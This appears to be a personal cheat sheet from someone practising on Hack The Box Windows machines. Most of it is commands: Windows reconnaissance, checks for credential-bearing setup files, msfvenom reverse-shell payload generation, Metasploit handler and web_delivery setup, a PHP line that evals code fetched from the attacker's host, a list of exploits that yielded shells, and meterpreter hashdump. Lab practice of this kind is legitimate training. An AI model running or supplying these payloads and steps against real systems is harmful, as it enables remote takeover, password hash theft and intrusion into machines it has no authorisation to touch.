I did root many windows rig in the last week. You can practice your skill too, just go to hackthebox.eu. Here i will not tell you how specificity root those vulnerable windows os, i just want to keep some of the basics that i learned from this.
As expected the info gathering is the same nmap nikto dirb etc.
The windows command line, as i am used to unix bash this command line was like Korean to me.
Here are the basic commands that are useful :
cat equivalent is type ls is dir systeminfo to use with windows vuln finder and know more about device you are hacking sc to start and close service search function is find
Inside the rig there are command to do some more gathering :
>whoami >systeminfo | findstr /B /C:"OS Name" /C:"OS Version" condensated systeminfo >hostname >echo %username% >net user >ipconfig /all >arp -A >route print >netstat -ano and netsh firewall show state see active network connection and firewall rules >schtasks /query /fo LIST /v display shitload of scheduled task >tasklist /SVC links running processes to started services >net start To see windows services started >DRIVERQUERY Show all maybe vunl. drivers and their date of birth
Sometime you can find info inside those, good idea to check :
c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
To facilitate the work and find evident vulns we can use wmic, this way we can find witch patches are used on the rig :
wmic qfe get Caption,Description,HotFixID,InstalledOn
howto gain meterpreter shell :
One machine have his ftp open to anonymous connection so
msfvenom -f aspx -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4443 -e x86/shikata_ga_nai -o exploit.aspx
Other practical msfvenom payload :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
use exploit/multi/script/web_delivery set target 1 set lhost x.x.x.x set payload php/meterpreter/reverse_tcp run
<?php eval(file_get_contents('http://MYIP:8080/xxxxxxxxx')); ?>
Basic remote handler :
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z
(see https://netsec.ws/?p=331 for other good windows payload)
Those are some vuln that gave me shell : ms10_015_kitrap0d, rejetto_hfs_exec escalation ms16_032_secondary_logon_hanle_privesc, ScStoragePathFromUrl then reverse shell.exe somewere and then ms14_058_track_popup_menu, EthernalBlue.
Next we gain a meterpreter we can use it for more information gathering:
meterpreter >getuid meterpreter >sysinfo meterpreter >ipconfig meterpreter >search -f *.txt meterpreter >use post/multi/recon/local_exploit_suggester meterpreter >use post/windows/gather/enum_patches meterpreter >use post/windows/gather/enum_applications meterpreter >hashdump
Last thing is windows-exploit-sugggester.py, you feed it with the full systeminfo and it give you exploit the same way metasploit local exploit suggester.
./windows-exploit-suggester.py --update sudo apt-get install python-xlrd ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Some ressources :
Easy Remote Shells with Web Delivery
For safekeep : https://www.ambionics.io/blog/drupal-services-module-rce